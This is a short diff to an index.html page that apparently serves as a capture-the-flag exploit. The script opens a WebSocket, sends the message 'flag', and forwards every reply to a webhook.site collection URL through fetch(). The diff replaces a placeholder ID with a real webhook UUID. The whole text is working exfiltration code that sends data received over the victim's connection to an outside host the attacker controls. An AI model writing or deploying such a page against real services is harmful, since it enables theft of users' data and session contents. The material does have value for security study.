--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
           ws.send("flag");
         };
         ws.onmessage = (e) => {
-          fetch("https://webhook.site/TON_ID?data=" + encodeURIComponent(e.data));
+          fetch("https://webhook.site/0693fa2b-5ed3-439e-8073-32e3b5e1e1f9?data=" + encodeURIComponent(e.data));
         };
       };
     </script>
